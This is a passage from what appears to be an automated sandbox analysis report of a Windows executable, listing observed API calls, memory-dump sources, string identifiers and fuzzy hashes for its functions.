                                                                                    • Opcode Fuzzy Hash: a7d48c479effa99c13726cd06c9a81b40db213f168e3472006e923150bc3a552
                                                                                    • Instruction Fuzzy Hash: 0CF0A061340224199D203DBF2889EBF125CC9827EFB54077BF990E22D2DA2E5F87426D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C66A6,?,006AD078,00000000,00000000), ref: 005C65AC
                                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C66A6,?,006AD078), ref: 005C661A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID: jn\$jn\
                                                                                    • API String ID: 3660427363-2382671196
                                                                                    • Opcode ID: 3e48dd5595439cec9071c1e48ee77c5669d35979900cfc549d71363e24bad7b2
                                                                                    • Instruction ID: 8bceae826fb58f5cc1abe10999adb5643ee7cb9af79bc91dae7968670a065b85
                                                                                    • Opcode Fuzzy Hash: 3e48dd5595439cec9071c1e48ee77c5669d35979900cfc549d71363e24bad7b2
                                                                                    • Instruction Fuzzy Hash: C0411871900219AFDB20DFD5C981EAEBBB9FB44704F61446EE800FB280D734AF848B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 00409FD0
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 0040A009
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 6b04fe895df515a821d09e547ffe5bfc8ba40b00724ca42204d1de2ed8c9432c
                                                                                    • Instruction ID: 014c5f1a4e041581483faaf8c6c30c3af58183677a5e41c876bcbf2d6f0d04a1
                                                                                    • Opcode Fuzzy Hash: 6b04fe895df515a821d09e547ffe5bfc8ba40b00724ca42204d1de2ed8c9432c
                                                                                    • Instruction Fuzzy Hash: 08316F20A016428AE720EB7A9484B2777E6AB44328F14053FE449E32E3DBBDDC84C75D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 00409FD0
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58E2,00000000), ref: 0040A009
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: bc5cc9c885041f3e0416e36a86510f2d3f0a1f0eb85ab9a766e2f376309b75d0
                                                                                    • Instruction ID: efb01f5a50f6461e4192e351dbf5a863323bf4e3968e843dfa2323db1f55653e
                                                                                    • Opcode Fuzzy Hash: bc5cc9c885041f3e0416e36a86510f2d3f0a1f0eb85ab9a766e2f376309b75d0
                                                                                    • Instruction Fuzzy Hash: 38316020A057824AE721EB769484B2777E26F14318F14447FE049E62E3DBBDDC84C75E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: e2fbedc3dc89719e5dd2976349d3016b2513452d0a3c721afe5b6b3b40081790
                                                                                    • Instruction ID: 76cbbdd911646a042e8386dfe44f4c7e199d23327d7aedec1f7355223984a46f
                                                                                    • Opcode Fuzzy Hash: e2fbedc3dc89719e5dd2976349d3016b2513452d0a3c721afe5b6b3b40081790
                                                                                    • Instruction Fuzzy Hash: 0C0184716411047BCB50EB98EC85FEA739EE749318F14D21BF508EB392DA79D8418798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WaitForInputIdle.USER32 ref: 0060E964
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 0060E986
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 0060E997
                                                                                    • CloseHandle.KERNEL32(00000001,0060E9C4,0060E9BD,?,?,?,00000001,?,?,0060ED66,?,00000000,0060ED7C,?,?,?), ref: 0060E9B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4071923889-0
                                                                                    • Opcode ID: d4595798dbbd3cccb17cd9651617aba3631158074f85f98b5c6695d3779827f6
                                                                                    • Instruction ID: b0ec01102f1d6a048394a8bbdf14247bb0d5afa7f8636e75558ea4907a3e5d2e
                                                                                    • Opcode Fuzzy Hash: d4595798dbbd3cccb17cd9651617aba3631158074f85f98b5c6695d3779827f6
                                                                                    • Instruction Fuzzy Hash: 5B012870A803147EEB24DBA68D06FEBBBADDF45720F510916F604C32C1D5759D40C665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 2bedbc9781a32906f3d6a9bc52efc672a59cc3eb09c43f68aa12ebb7b9980c23
                                                                                    • Instruction ID: 2fff96d873347bd790470967934f41cc3c5b953411b1929c54c424c1fdffd6dc
                                                                                    • Opcode Fuzzy Hash: 2bedbc9781a32906f3d6a9bc52efc672a59cc3eb09c43f68aa12ebb7b9980c23
                                                                                    • Instruction Fuzzy Hash: B5E02BA27083911882257DAE18855BE598ACFC375DF28193FF094C2143C6088D854626
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060CF89,?,006D479C,?,00000003,00000000,00000000,?,006AB2FB,00000000,006AB42A), ref: 0060CED8
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060CF89,?,006D479C,?,00000003,00000000,00000000,?,006AB2FB,00000000,006AB42A), ref: 0060CEE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 1990292899e41e678343515c0d89d56f152e79c03e827f697b231b302f2421b6
                                                                                    • Instruction ID: bd18ce1fa3822070f52fa9210757cddfa10fef4474c97575e6730c1523ad4e06
                                                                                    • Opcode Fuzzy Hash: 1990292899e41e678343515c0d89d56f152e79c03e827f697b231b302f2421b6
                                                                                    • Instruction Fuzzy Hash: EE216575A402099FDB04EBE1C842EEFB7BAEF88304F10457AE501A3781DA749E058AA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 0060B9EC
                                                                                    • GetLastError.KERNEL32(00000000,00000000,006D479C,?,?,00624B84,00000000,jKb,?,00000000,00000000,0060BA12,?,?,00000000,00000001), ref: 0060B9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastProcess
                                                                                    • String ID: jKb
                                                                                    • API String ID: 2919029540-170918238
                                                                                    • Opcode ID: c1b916c59321e3fa91579aeb3cdac3cd55d30723fa64c6d9926a0ea5d314481d
                                                                                    • Instruction ID: f0c62e7812bfd872003ae221291c5b02b096b3c9bac239c5ed21538e2c768951
                                                                                    • Opcode Fuzzy Hash: c1b916c59321e3fa91579aeb3cdac3cd55d30723fa64c6d9926a0ea5d314481d
                                                                                    • Instruction Fuzzy Hash: 25112A72600208AFCB44CEA9DC41DEFB7ECEB4D310B518566F908D3241D734AE108764
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick
                                                                                    • String ID: Failed to remove temporary directory: $Rm
                                                                                    • API String ID: 536389180-1076249570
                                                                                    • Opcode ID: 9455056cfd00dbf33753fac0645bc5bf9c8d6e161eee054098b2032e13d056f6
                                                                                    • Instruction ID: 398c982c0538bc614d191d51ddc6a0f8b2f8344efc011b20d1c36e18f0abd6f5
                                                                                    • Opcode Fuzzy Hash: 9455056cfd00dbf33753fac0645bc5bf9c8d6e161eee054098b2032e13d056f6
                                                                                    • Instruction Fuzzy Hash: 22012430A50B00AADB62FB71EC03B9973D7EB0A704F50542AF001972C3E7B4AC008E18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AAF73,00000000,006AAF8E,?,00000000,00000000,?,006B6424,00000006), ref: 006AABEA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
• Opcode ID: 3e3a4d0be09f8e92ab92d2551e3a83229c9f1976f345d8ef1f7fbdb37c4ae43b
• Instruction ID: 305c036771833dfdc17d30d00ed60186274228a7a0d0d41d10220e0ec65000dd
• Opcode Fuzzy Hash: 3e3a4d0be09f8e92ab92d2551e3a83229c9f1976f345d8ef1f7fbdb37c4ae43b
• Instruction Fuzzy Hash: 9FF0B430B45244AFDB01FAD4D956BAA7B9BD787314F60006EE1015B781D764AE40DB21
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Open
• String ID: Control Panel\Desktop\ResourceLocale$jn\
• API String ID: 71445658-1009623656
• Opcode ID: 4df7dab56c477363e90a00ee02f53cdc5579ada3479c64b4cdcbde454e119a82
• Instruction ID: f71c6a141f3997f2863d7813df77b61548f7dd53a97879805adc53d508b96e25
• Opcode Fuzzy Hash: 4df7dab56c477363e90a00ee02f53cdc5579ada3479c64b4cdcbde454e119a82
• Instruction Fuzzy Hash: E3D0C9769502287BAB009EC9DC41EFB7B9DEB19360F50841AFD0497101C6B4EDA187F4
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(006CEADC,00000000,00008000), ref: 00406E0E
• VirtualFree.KERNEL32(006D0B80,00000000,00008000), ref: 00406E8A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: FreeVirtual
• String ID: |l
• API String ID: 1263568516-2943479574
• Opcode ID: 32207062ea42549adb7d8cd3475f211863a90d9262ab72e18aeacffdd3282589
• Instruction ID: 7e10c0828048ea4be300fdc8c2ce23dddf2df71dc9f68ae824fb6f8d85bed3de
• Opcode Fuzzy Hash: 32207062ea42549adb7d8cd3475f211863a90d9262ab72e18aeacffdd3282589
• Instruction Fuzzy Hash: F411C1716003108FD7688F18C941B26BBE1FB88710F16807FE54AEF380D679AC018BD8
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendNotifyMessageW.USER32(0009025C,00000496,00002711,-00000001), ref: 006AD020
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: MessageNotifySend
• String ID: MS PGothic
• API String ID: 3556456075-3532686627
• Opcode ID: b6c258fb3c33f2813c3342e6157044606e6013f872fb64804e9522e309d3d3da
• Instruction ID: 89a382baa9b680b343c583d8872c3f7c86f8ccc800703f58e8dd630edb69a3e5
• Opcode Fuzzy Hash: b6c258fb3c33f2813c3342e6157044606e6013f872fb64804e9522e309d3d3da
• Instruction Fuzzy Hash: 29516E307012408FCB10FF69D889E6A3BA3FB86354B64557AE4069F766CA35DC42CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: CreateWindow
